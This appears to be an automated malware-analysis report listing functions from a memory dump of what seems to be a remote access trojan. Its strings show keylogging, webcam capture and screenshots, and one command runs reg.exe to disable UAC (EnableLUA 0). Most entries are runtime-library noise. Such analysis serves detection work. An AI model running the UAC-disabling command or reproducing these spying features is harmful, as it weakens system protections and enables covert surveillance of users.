                                          Function 0040E7E5, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040E7F2
                                          • int.LIBCPMT ref: 0040E805
                                            • Part of subcall function 0040B94C: std::_Lockit::_Lockit.LIBCPMT ref: 0040B95D
                                            • Part of subcall function 0040B94C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040B977
                                          • std::locale::_Getfacet.LIBCPMT ref: 0040E80E
                                          • std::_Facet_Register.LIBCPMT ref: 0040E845
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040E84E
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86C
                                          • __Init_thread_footer.LIBCMT ref: 0040E8AD
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetInit_thread_footerRegisterThrowstd::locale::_
                                          • String ID:
                                          • API String ID: 2409581025-0
                                          • Opcode ID: e7a0018a1746f9c7bf4673166abd77dce41b100f788e83672023b9d031f69d2e
                                          • Instruction ID: 03fd642756e00294ec4acf8aadaa37b4638c280f2e7f5516d862d72f379d1b29
                                          • Opcode Fuzzy Hash: e7a0018a1746f9c7bf4673166abd77dce41b100f788e83672023b9d031f69d2e
                                          • Instruction Fuzzy Hash: 7C21D332E001149BC714FB69D906A9E77B8DB44724B60417FE800B72D2EB78AD01879E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409634, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
                                            • Part of subcall function 00409E69: char_traits.LIBCPMT ref: 00409E79
                                          • wsprintfW.USER32 ref: 004096C3
                                          • SetEvent.KERNEL32(?,00000000), ref: 004096ED
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: EventLocalTimechar_traitswsprintf
                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                          • API String ID: 3003339404-248792730
                                          • Opcode ID: ca61a9da6b4990f96a699c8070fe04a4003c35820f2ebf99f622e66c3a4d0d69
                                          • Instruction ID: dd13208d924f003fd79d0c2a63de2e9b71645c7df6fae77663c0b624719a6389
                                          • Opcode Fuzzy Hash: ca61a9da6b4990f96a699c8070fe04a4003c35820f2ebf99f622e66c3a4d0d69
                                          • Instruction Fuzzy Hash: 7021A4724001186AC728EBA5EC958FF77B9AF08355F00413FF847621D2EE78AA45D768
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0044917A, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00448EC1: _free.LIBCMT ref: 00448EEA
                                          • _free.LIBCMT ref: 004491C8
                                            • Part of subcall function 004401F5: RtlFreeHeap.NTDLL(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
                                            • Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D
                                          • _free.LIBCMT ref: 004491D3
                                          • _free.LIBCMT ref: 004491DE
                                          • _free.LIBCMT ref: 00449232
                                          • _free.LIBCMT ref: 0044923D
                                          • _free.LIBCMT ref: 00449248
                                          • _free.LIBCMT ref: 00449253
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 756ad40e604d71209bccb265ad132824995b9687c22d1463e70498a03dee4a72
                                          • Instruction ID: d0ac5bec4300d42e5daa1f0178d5914e2472619a840d7a0986f756f09d30ade7
                                          • Opcode Fuzzy Hash: 756ad40e604d71209bccb265ad132824995b9687c22d1463e70498a03dee4a72
                                          • Instruction Fuzzy Hash: A7115172940B04BAFA20BBB2CC47FCF779CAF00705F50081EB39AA6052DE7EB5244658
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004350B5, Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,?,004350AC,004321F2), ref: 004350C3
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004350D1
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004350EA
                                          • SetLastError.KERNEL32(00000000,?,004350AC,004321F2), ref: 0043513C
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 0771ed93609d5e7a78759e24eab81c9c5a6dfd178299050cac477f2bce081d65
                                          • Instruction ID: a515c6194843fa53ce6413da374b9e5764b9e55810f12d35b037beed10178e82
                                          • Opcode Fuzzy Hash: 0771ed93609d5e7a78759e24eab81c9c5a6dfd178299050cac477f2bce081d65
                                          • Instruction Fuzzy Hash: EC01F532549B115EEA152E79AC4562B2654DB0D779F20223FF220511F1FE594C11564E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040511B, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38synchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046C2E8,?,00404CA9,00000001,0046C2E8,00404C56,00000000,00000000,00000000), ref: 00405159
                                          • SetEvent.KERNEL32(?,?,00404CA9,00000001,0046C2E8,00404C56,00000000,00000000,00000000), ref: 00405165
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00404CA9,00000001,0046C2E8,00404C56,00000000,00000000,00000000), ref: 00405170
                                          • CloseHandle.KERNEL32(?,?,00404CA9,00000001,0046C2E8,00404C56,00000000,00000000,00000000), ref: 00405179
                                            • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                          • String ID: Connection KeepAlive disabled$[WARNING]
                                          • API String ID: 2993684571-804309475
                                          • Opcode ID: 6700614dca504244a55bd319c10cf8dd84f4c90e38274ba8f930ec3cb829daee
                                          • Instruction ID: 60a08de37f047c10c4ebd60d286cc91250b6658f2aab9bb1a866a2a778ec74b8
                                          • Opcode Fuzzy Hash: 6700614dca504244a55bd319c10cf8dd84f4c90e38274ba8f930ec3cb829daee
                                          • Instruction Fuzzy Hash: E0F0C272900B407FDB103BB59C0EA7B7B98DB0135AF04057AFD41926E2DAB9D8548B9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00416737, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                                          • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00416769
                                          • PlaySoundW.WINMM(00000000,00000000), ref: 00416777
                                          • Sleep.KERNEL32(00002710), ref: 0041677E
                                          • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00416787
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: PlaySound$HandleLocalModuleSleepTime
                                          • String ID: Alarm has been triggered!$[ALARM]
                                          • API String ID: 614609389-1190268461
                                          • Opcode ID: a72f7bbe0ff649907879a8ec4559d77060f8c7e034846c054ca5bf069f778dcf
                                          • Instruction ID: 3dbfa3bc3acc833274b6e0f43357c326849184f6c95de14e1e3858e62b15b156
                                          • Opcode Fuzzy Hash: a72f7bbe0ff649907879a8ec4559d77060f8c7e034846c054ca5bf069f778dcf
                                          • Instruction Fuzzy Hash: D9E09222A00221379514376A6D0FD6F3D28CAC2B62B01016FFE08661829D944810C6FB
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00435799, Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                          Download Yara Rule
                                          APIs
                                          • __allrem.LIBCMT ref: 00435926
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435942
                                          • __allrem.LIBCMT ref: 00435959
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435977
                                          • __allrem.LIBCMT ref: 0043598E
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004359AC
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 1992179935-0
                                          • Opcode ID: 258e57513f608f90b5a19f46d233bda83a55d4bc811eeb716edfff4965c679b3
                                          • Instruction ID: 35372c1425533dcebe3bda436374fdb164c2facb18fb88ba24de970f82e87be5
                                          • Opcode Fuzzy Hash: 258e57513f608f90b5a19f46d233bda83a55d4bc811eeb716edfff4965c679b3
                                          • Instruction Fuzzy Hash: 4D810972600F06ABE724AE69CC42B6B73E8AF49778F24552FF411D7681E77CD9008798
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0043F14E, Relevance: 9.2, APIs: 6, Instructions: 200COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: __cftoe
                                          • String ID:
                                          • API String ID: 4189289331-0
                                          • Opcode ID: d08779da4da2b8c7503d64d17439e7d569a523021f011bdc61055c0fc5f488fa
                                          • Instruction ID: bcbe42ceaebb365c1ac6e2a5e9ed457d7b54482c9f0ea6a0937b1c10150bb98b
                                          • Opcode Fuzzy Hash: d08779da4da2b8c7503d64d17439e7d569a523021f011bdc61055c0fc5f488fa
                                          • Instruction Fuzzy Hash: E451E432D00205EADF249B69DC41BAF77A8AF4D324F60527FF91592282DB3DDD048A6C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041640B, Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,00415FB6,00000000), ref: 0041641A
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,00415FB6,00000000), ref: 0041642E
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041643B
                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00415FB6,00000000), ref: 0041644A
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041645C
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041645F
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: d4eaebdc15304b872416eaa7f8d04e900d6049d733b55bafd53bfd73d26ce288
                                          • Instruction ID: 4eedda638a80435df945b1a666cb81191fe5a480f3a20e792e67f186b8beea13
                                          • Opcode Fuzzy Hash: d4eaebdc15304b872416eaa7f8d04e900d6049d733b55bafd53bfd73d26ce288
                                          • Instruction Fuzzy Hash: 16F0F6315403187BD211AF65DC89DBF3B6CDB45B92F00002AFD0593192DF28CE4596F9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00416576, Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00415EB6,00000000), ref: 00416585
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00415EB6,00000000), ref: 00416599
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165A6
                                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00415EB6,00000000), ref: 004165B5
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165C7
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165CA
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: 3436dafb5ab72bcd86b129217272098d71bfff533fa1ccb5049d0d6cd0b5ba5f
                                          • Instruction ID: f156ac7e468d3ae20af57b6ed191c57fcc92838d981ab40ed78c867a72fe8b74
                                          • Opcode Fuzzy Hash: 3436dafb5ab72bcd86b129217272098d71bfff533fa1ccb5049d0d6cd0b5ba5f
                                          • Instruction Fuzzy Hash: 6DF0C2315413187BD211AF65EC49EBF3BACDB45B92B00002AFE0992196DA38CE4596E9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041576E, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 128fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00414906: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00414921
                                            • Part of subcall function 00414906: CreateCompatibleDC.GDI32(00000000), ref: 0041492D
                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 004157C7
                                            • Part of subcall function 0041441B: GdipLoadImageFromStream.GDIPLUS(?,?), ref: 00414431
                                            • Part of subcall function 00414493: GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004144A4
                                            • Part of subcall function 004179DC: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9
                                          • DeleteFileW.KERNEL32(00000000,0000001B), ref: 00415858
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Create$File$GdipImageStream$CompatibleDeleteFromLoadSave
                                          • String ID: dat$image/png$png
                                          • API String ID: 1095564277-186023265
                                          • Opcode ID: 775667cc21e8ef688f989a89bfb0c9f6235a0d29cd1d95de21b8bca7321ddca0
                                          • Instruction ID: 0c36451510116b7bd957a4aa3b7b106e47bf9e8d8c5c7fe72891902c2c8ac275
                                          • Opcode Fuzzy Hash: 775667cc21e8ef688f989a89bfb0c9f6235a0d29cd1d95de21b8bca7321ddca0
                                          • Instruction Fuzzy Hash: 304172711183409BC314FB62C852EEFB3A9AF95358F00093FF446671E2EF385A48C69A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408742, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateThread.KERNEL32(00000000,00000000,0040884B,?,00000000,00000000), ref: 004087CA
                                          • CreateThread.KERNEL32(00000000,00000000,00408830,?,00000000,00000000), ref: 004087DA
                                          • CreateThread.KERNEL32(00000000,00000000,0040885A,?,00000000,00000000), ref: 004087E6
                                            • Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
                                            • Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
                                            • Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread$EventLocalTimewsprintf
                                          • String ID: Offline Keylogger Started$[Info]
                                          • API String ID: 3534694722-3531117058
                                          • Opcode ID: 1e8aff02d5c109468fd494a4a84b3e52d0648772be4b1af5f9673befedfce18a
                                          • Instruction ID: e7dd77b1288fa42652556686635590a3b19cb298011fac88deeca58e0b290907
                                          • Opcode Fuzzy Hash: 1e8aff02d5c109468fd494a4a84b3e52d0648772be4b1af5f9673befedfce18a
                                          • Instruction Fuzzy Hash: 5711A7B21003083AD214B6668D86DBB3A5CDA9139CB40053FF985221D3EE785E59C6FA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004093AD, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65threadCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
                                            • Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
                                            • Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED
                                            • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                                          • CreateThread.KERNEL32(00000000,00000000,Function_00008830,?,00000000,00000000), ref: 0040942D
                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000885A,?,00000000,00000000), ref: 00409439
                                          • CreateThread.KERNEL32(00000000,00000000,Function_00008869,?,00000000,00000000), ref: 00409445
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread$LocalTime$Eventwsprintf
                                          • String ID: Online Keylogger Started$[Info]
                                          • API String ID: 3546759147-3401407043
                                          • Opcode ID: 252a10f4c7db2c3d790c08ea6cd02ea1070b72bc27798e53e0cb27eb6ddf0f2a
                                          • Instruction ID: 55f70c683c1dd9f299002b3fa9371d2aabc85af949f207a7a15db3bb5bde523d
                                          • Opcode Fuzzy Hash: 252a10f4c7db2c3d790c08ea6cd02ea1070b72bc27798e53e0cb27eb6ddf0f2a
                                          • Instruction Fuzzy Hash: 5501C8A16002193AD62476764C86DBF7A6CCA81398F80057FFA85321C3D97D5C4A82FA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040D3F7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,0040C5FB,00000000,0046C578,00000001), ref: 0040D43B
                                          • CloseHandle.KERNEL32(0040C5FB), ref: 0040D44A
                                          • CloseHandle.KERNEL32(00000027), ref: 0040D44F
                                          Strings
                                          • C:\Windows\System32\cmd.exe, xrefs: 0040D436
                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040D431
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$CreateProcess
                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                          • API String ID: 2922976086-4183131282
                                          • Opcode ID: ef92d07ca1aae4fdf93b7244d02a4cef1616cfdac0d91f616d34c415f3e09b10
                                          • Instruction ID: 26fca9c7a1bbdca23175ff39a315bbad59b3fabc2693cff21f74514230984448
                                          • Opcode Fuzzy Hash: ef92d07ca1aae4fdf93b7244d02a4cef1616cfdac0d91f616d34c415f3e09b10
                                          • Instruction Fuzzy Hash: BDF012B290061C7FEB105AE9DC85EEFBB6CEB48795F100476F604E6011D5715D148AA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040519B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44synchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,00405196), ref: 004051B1
                                          • CloseHandle.KERNEL32(?), ref: 00405207
                                          • SetEvent.KERNEL32(?), ref: 00405216
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEventHandleObjectSingleWait
                                          • String ID: Connection timeout$[WARNING]
                                          • API String ID: 2055531096-1470507543
                                          • Opcode ID: 0ba4f2503bf5f0317bc10ecb581ea82cfaeb46762227d70d6f5b6137543dff9d
                                          • Instruction ID: 7da91c5eb563825218e032d44bddc69cdf30f244b65d1975d56df2ebc3a46463
                                          • Opcode Fuzzy Hash: 0ba4f2503bf5f0317bc10ecb581ea82cfaeb46762227d70d6f5b6137543dff9d
                                          • Instruction Fuzzy Hash: B801B131A41B40AFC721AF75884651BBBA4EF0530A700447EE5C3A6AA2CBB89404CF9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004126DB, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 42COMMON
                                          Download Yara Rule
                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041271D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ExecuteShell
                                          • String ID: /C $8E@$cmd.exe$open
                                          • API String ID: 587946157-914314769
                                          • Opcode ID: 7aa96fee03e6401ac1b22889eba9856a68264f954b39489df8aa8793d1cc152a
                                          • Instruction ID: 47ea0f4151d847ad7c85bc2547405b4448f03a7c8d467b7d431ad20f766adf74
                                          • Opcode Fuzzy Hash: 7aa96fee03e6401ac1b22889eba9856a68264f954b39489df8aa8793d1cc152a
                                          • Instruction Fuzzy Hash: 6BF036711183415BC204FB72D8919BFB3A9AB90309F10083FB946A20E3EF385919865E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040B82B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040B836
                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040B875
                                            • Part of subcall function 004303A0: _Yarn.LIBCPMT ref: 004303BF
                                            • Part of subcall function 004303A0: _Yarn.LIBCPMT ref: 004303E3
                                          • std::bad_exception::bad_exception.LIBCMT ref: 0040B88D
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040B89B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
                                          • String ID: bad locale name
                                          • API String ID: 3706160523-1405518554
                                          • Opcode ID: e4434316a2aa22c80a8ecccf78aeb5c6b4e9cbfc58a69b48d55e7b8d31bdf15a
                                          • Instruction ID: 089b12ecbc6339823181e46ec4ed0a9302f8c45fa17c933d22815baa8faf1e53
                                          • Opcode Fuzzy Hash: e4434316a2aa22c80a8ecccf78aeb5c6b4e9cbfc58a69b48d55e7b8d31bdf15a
                                          • Instruction Fuzzy Hash: 1DF031318042086BC228FAA5ED57A9A7374AF14754F50463FF946224D1EF7CB54DC68D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0043B2BA, Relevance: 7.7, APIs: 5, Instructions: 222COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f3e5902103fbf73d685bb82c023768945668d30e32b5126960101710bc94102
                                          • Instruction ID: 0e8ff1e7bf94726707b95a2ea2eb2a738027cd1da7e878330fc773e679c7ecaa
                                          • Opcode Fuzzy Hash: 4f3e5902103fbf73d685bb82c023768945668d30e32b5126960101710bc94102
                                          • Instruction Fuzzy Hash: 5171D231900216ABCF21CF59C884BBFBB75EF59324F14222BEA1167282D7789D41C7E9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404486, Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 208sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004028D8: std::_Xinvalid_argument.LIBCPMT ref: 004028DD
                                          • Sleep.KERNEL32(00000000,?), ref: 004045DB
                                            • Part of subcall function 0040471E: __EH_prolog.LIBCMT ref: 00404723
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: H_prologSleepXinvalid_argumentstd::_
                                          • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                          • API String ID: 834325642-3547787478
                                          • Opcode ID: 9f95b5734df59e391d0ca30a0dbebe00e36f8db35eb61ae523649e3ecf460818
                                          • Instruction ID: 36a5e228549547fe3264f4e150403a2e0a3e3e2746ad4685d8a770f54e79c9b4
                                          • Opcode Fuzzy Hash: 9f95b5734df59e391d0ca30a0dbebe00e36f8db35eb61ae523649e3ecf460818
                                          • Instruction Fuzzy Hash: 6651E4B1604200ABCA05BB769D0A66E3B559BC5308F00443FF905BB7E2EF7D8945879E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040F6A7, Relevance: 7.7, APIs: 5, Instructions: 206memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040F14A: SetLastError.KERNEL32(0000000D,0040F6C6,00000000,00000000,0040AF7B), ref: 0040F150
                                          • SetLastError.KERNEL32(000000C1,00000000,00000000,0040AF7B), ref: 0040F6DD
                                          • GetNativeSystemInfo.KERNEL32(?,00000000,00000000,0040AF7B), ref: 0040F750
                                          • GetProcessHeap.KERNEL32(00000008,00000040), ref: 0040F7BC
                                          • HeapAlloc.KERNEL32(00000000), ref: 0040F7C3
                                          • SetLastError.KERNEL32(0000045A), ref: 0040F8D5
                                            • Part of subcall function 0040F65A: VirtualFree.KERNEL32(00008000,00000000,00000000,?,0040F7DC,00000000,00000000,00008000,00000000), ref: 0040F666
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
